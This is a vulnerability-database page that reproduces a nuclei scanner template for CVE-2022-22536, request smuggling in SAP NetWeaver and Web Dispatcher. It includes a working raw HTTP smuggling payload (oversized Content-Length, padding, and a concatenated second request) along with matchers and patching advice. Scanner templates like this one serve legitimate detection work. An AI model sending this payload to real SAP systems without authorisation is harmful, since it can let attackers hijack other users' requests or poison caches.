Lucene search
K

SAP Memory Pipes (MPI) Desynchronization

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 159 Views

SAP Memory Pipes (MPI) vulnerabilty in multiple SAP products

Related
Refs
Code
id: CVE-2022-22536

info:
  name: SAP Memory Pipes (MPI) Desynchronization
  author: pdteam
  severity: critical
  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage.
  remediation: |
    Apply the latest security patches and updates provided by SAP to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22536
    - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
    - https://github.com/Onapsis/onapsis_icmad_scanner
    - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
    - https://launchpad.support.sap.com/#/notes/3123396
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-22536
    cwe-id: CWE-444
    epss-score: 0.97945
    epss-percentile: 0.99902
    cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sap
    product: content_server
    shodan-query: http.favicon.hash:-266008933
    fofa-query: icon_hash=-266008933
  tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev,vkev,vuln

http:
  - raw:
      - |+
        GET {{sap_path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 82646
        Connection: keep-alive

        {{repeat("A", 82642)}}

        GET / HTTP/1.1
        Host: {{Hostname}}

    payloads:
      sap_path:
        # based on https://github.com/Onapsis/onapsis_icmad_scanner
        - /sap/admin/public/default.html
        - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
    stop-at-first-match: true
    unsafe: true
    read-all: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(tolower(body), 'administration')"
          - "contains(tolower(header), 'content-type: image/png')"
        condition: or

      - type: word
        part: body
        words:
          - "HTTP/1.0 400 Bad Request" # error in concatenated response
          - "HTTP/1.0 500 Internal Server Error"
          - "HTTP/1.0 500 Dispatching Error"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b798bb0859d7192e3df752aadb1aac80cbf950106ea291f53877c98dc63113e4022045d85b32e94ce06759c3f119eabcef9e4e8a141204170ea05ed8f9d7ed260287:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8 - 10
CVSS 210
EPSS0.97945
SSVC
159